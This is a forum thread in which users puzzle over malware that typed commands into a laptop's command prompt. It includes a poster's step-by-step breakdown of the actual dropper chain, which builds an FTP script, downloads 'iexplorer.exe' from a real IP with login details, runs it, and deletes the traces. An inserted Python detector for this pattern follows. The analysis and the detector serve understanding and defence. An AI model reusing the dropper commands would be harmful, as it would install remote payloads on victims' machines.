Author Topic: Uhm, virus? Help?  (Read 10537 times)

2 idiots here.

There's an FTP IP that has relations to a virus.

and the first thing you guys do is try to connect to it using your MAIN COMPUTER?

*facepalm*

I got a laptop with Ubuntu 11.04 and a 2000 VM all set up, and therefore the PC is immune to this virus.

By the way, from what I can tell this virus is supposed to spread and only spread.

It uploads itself to FTP servers whenever possible.

It exploits network vulnerabilities to reach other computers on the network.

And finally it spreads itself on IRC.

Not sure what else it's supposed to do by then.
Chances are, since it's connecting to an FTP server constantly, you're part of a botnet.

I disconnected as soon as I connected, I didn't even log in yet. Nothing can happen before you log in.


No need to be a starfish. Like I knew what it was supposed to do, I was curious. This isn't my main computer anyway. I'm running Wireshark, and I don't have any FTP connections atm. Like Lando said, I disconnected as soon as it started talking about POST.

So before I get off my tablet, I should mention:

I'm fairly positive that this virus thing never got to enter this into cmd.exe, nor ever connect to the FTP. My laptop hasn't been left unattended unless Notepad was up, and if it was I turned my wireless adapter off.

Fairly sure that, besides attempting to connect, no other damage has been done.


Maybe it's an aimbot. Boot up CS:GO and see if you're any good all of a sudden.

He didn't use a proxy.
brb lolling self
I'll give that IP to some people and see what they do.

Well, left laptop on all night, I think that this problem is gone. After uninstalling VNC, I haven't had the virus type anything so far.

I didn't read all pages so I don't know if anybody already said this, but here's what, according to the text in the OP, is going on.

What is happening is that some program is trying to download a file named "iexplorer.exe" to your \Windows\system32\ folder and then run it.
However, it's doing this by sending keystrokes directly, which should run as cmd commands.
Basically, it seems to fail to open command prompt initially.

start %systemroot%\system32\cmd.exe

A strange way of getting to \Windows\system32 in command prompt.

del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq

If the file eq exists, delete it. Then it writes this to a file named eq:

open 181.166.154.188 7191 - connect to some strange FTP server somewhere
user 16446 10097 - login to the FTP server
get iexplorer.exe - download the file iexplorer.exe
quit - exit the FTP client

ftp -n -s:eq

Open Windows' default command line FTP client and execute the commands in the eq file.

iexplorer.exe

Open the downloaded file.

del eq

Delete the file eq (to remove traces?).
« Last Edit: February 04, 2013, 07:04:40 AM by Port »
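The post above walks through the dropper one command at a time. The script below is an added example (not code from the thread or from any poster) showing how a defender could recognise the same pattern automatically in command-line telemetry: it splits each cmd.exe line on "&", reconstructs any file built with "echo ... >> file", notices when that file is handed to "ftp -s:", and pulls the server, port, credentials and fetched file names out of the reconstructed FTP script. The sample input is constructed here from the five command lines quoted in the post; the function and class names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input: the five command lines quoted in the thread, in the
# form they might appear in keystroke or process-command-line telemetry.
SAMPLE_COMMANDS = [
    r"start %systemroot%\system32\cmd.exe",
    "del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq "
    "&echo get iexplorer.exe >> eq &echo quit >> eq",
    "ftp -n -s:eq",
    "iexplorer.exe",
    "del eq",
]

# "echo <text> >> <file>" appends a line to a file; this is how the script is built.
ECHO_APPEND = re.compile(r"^echo\s+(?P<text>.+?)\s*>>\s*(?P<file>\S+)\s*$", re.I)
# "ftp ... -s:<file>" makes the Windows ftp client read its commands from <file>.
FTP_SCRIPT = re.compile(r"^ftp\b.*?-s:(?P<file>\S+)", re.I)
DEL_FILE = re.compile(r"^(?:del|erase)\s+(?P<file>\S+)", re.I)


@dataclass
class FtpDropperReport:
    """Indicators recovered from a command sequence (hypothetical structure)."""
    script_file: Optional[str] = None
    server: Optional[str] = None
    port: Optional[int] = None
    username: Optional[str] = None
    password: Optional[str] = None
    downloaded: List[str] = field(default_factory=list)
    executed: List[str] = field(default_factory=list)
    stages: List[str] = field(default_factory=list)

    @property
    def is_dropper(self) -> bool:
        # Only flag when a script was both written with echo and run via ftp -s:.
        return "script_written" in self.stages and "ftp_script_run" in self.stages


def add_stage(report: FtpDropperReport, stage: str) -> None:
    if stage not in report.stages:
        report.stages.append(stage)


def split_chain(command: str) -> List[str]:
    """Split a cmd.exe line on '&' into its individual commands (quoting ignored)."""
    return [part.strip() for part in command.split("&") if part.strip()]


def parse_ftp_script(lines: List[str], report: FtpDropperReport) -> None:
    """Interpret the verbs the Windows ftp client reads from an -s: script."""
    for line in lines:
        words = line.split()
        if not words:
            continue
        verb = words[0].lower()
        if verb == "open" and len(words) >= 2:
            report.server = words[1]
            # ftp's open takes an optional port; default to 21 when absent.
            report.port = int(words[2]) if len(words) > 2 and words[2].isdigit() else 21
        elif verb == "user" and len(words) >= 2:
            report.username = words[1]
            report.password = words[2] if len(words) > 2 else None
        elif verb in ("get", "recv", "mget") and len(words) >= 2:
            report.downloaded.append(words[1])


def analyze(commands: List[str]) -> FtpDropperReport:
    """Walk the command lines in order and reconstruct the dropper's stages."""
    report = FtpDropperReport()
    scripts: Dict[str, List[str]] = {}  # file name (lowercased) -> lines appended
    for raw in commands:
        for cmd in split_chain(raw):
            m = ECHO_APPEND.match(cmd)
            if m:
                scripts.setdefault(m["file"].lower(), []).append(m["text"])
                add_stage(report, "script_written")
                continue
            m = FTP_SCRIPT.match(cmd)
            if m:
                report.script_file = m["file"]
                add_stage(report, "ftp_script_run")
                parse_ftp_script(scripts.get(m["file"].lower(), []), report)
                continue
            m = DEL_FILE.match(cmd)
            if m and report.script_file and m["file"].lower() == report.script_file.lower():
                # The first "del eq" runs before the script exists; only the one
                # after ftp has run counts as trace removal.
                add_stage(report, "script_deleted")
                continue
            if cmd.lower() in (name.lower() for name in report.downloaded):
                report.executed.append(cmd)
                add_stage(report, "payload_executed")
    return report


if __name__ == "__main__":
    print(analyze(SAMPLE_COMMANDS))
```

Matching on the echo-to-file plus ftp -s: combination, rather than on the specific IP or file name, is the useful part: the address and credentials change from sample to sample, while the technique of assembling an FTP script with echo and running it unattended with -n -s: is what makes this a dropper.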

I never got that part of the code. It uses command prompt to open command prompt.

Worst virus 2012

There are probably other viruses it needs to work. Once they're all downloaded it instantly wins your computer like Exodia.

So basically he swapped your default iexplorer.exe with some virus that probably adds you to a botnet.

What exactly is a botnet?

A network of computers, essentially acting as unwilling sleeper cells, most often mobilized for DDoS attacks on popular targets or otherwise.